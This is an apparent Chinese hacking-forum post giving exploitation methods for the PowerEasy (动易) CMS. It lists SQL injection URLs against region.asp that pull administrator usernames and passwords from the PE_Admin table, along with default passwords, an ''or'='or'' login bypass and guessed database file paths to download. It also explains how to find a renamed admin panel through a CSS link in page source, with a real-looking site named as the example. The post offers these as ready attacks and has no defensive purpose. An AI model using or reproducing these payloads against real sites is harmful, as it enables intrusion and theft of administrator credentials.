动易漏洞利用方法

admin

注入：
Region.asp?Country=tt&City=whytt&Province=shi'+and+1=2+union+select+username+from+PE_Admin+where+1<2+and+'1'='1

Region.asp?Country=tt&City=whytt&Province=shi'+and+1=2+union+select+password+from+PE_Admin+where+1<2+and+'1'='1


admin
admin888
'or'='or'
8888
2007
2008
2006
SiteManageCode8888/SiteManageCode
database/SiteWeaver6.5.mdb
database/SiteWeaver.mdb
PowerEasy2006
#SiteWeaver6.5.asa
PowerEasy2007
PowerEasy2008
database/PowerEasy2006.mdb
database/PowerEasy2007.mdb
database/PowerEasy2008.mdb


找后台方法：


    这个方法很巧，但也不是全部都行，因为有些的已经修改admin_login.asp的名称，针对修改路径是很有效的，也可以说是利用了管理员对css的疏忽。


漏洞文件：


  region.asp


  1、打开某动易核心的网站，在域名后加region.asp访问，如：http://www.hkyjj.com/region.asp。


  便会显示下面的内容：
  国家/地区：
  省/市/自治区：
  市/县/区/旗：


  2、然后查看“源文件”，在第四行有一段嵌入css的代码：


  <link href="Admin/Admin_Style.css" rel="stylesheet" type="text/css">


  可以看到路径是："Admin/Admin_Style.css"，便得知后台路径为“Admin/”，即“Admin_Style.css”前面的文件夹路径为后台路径。


产生原因：


    调用的CSS文件存放在后台目录下，导致利用源代码的查询而获取物理路径

帮帮顶顶！！

支持一下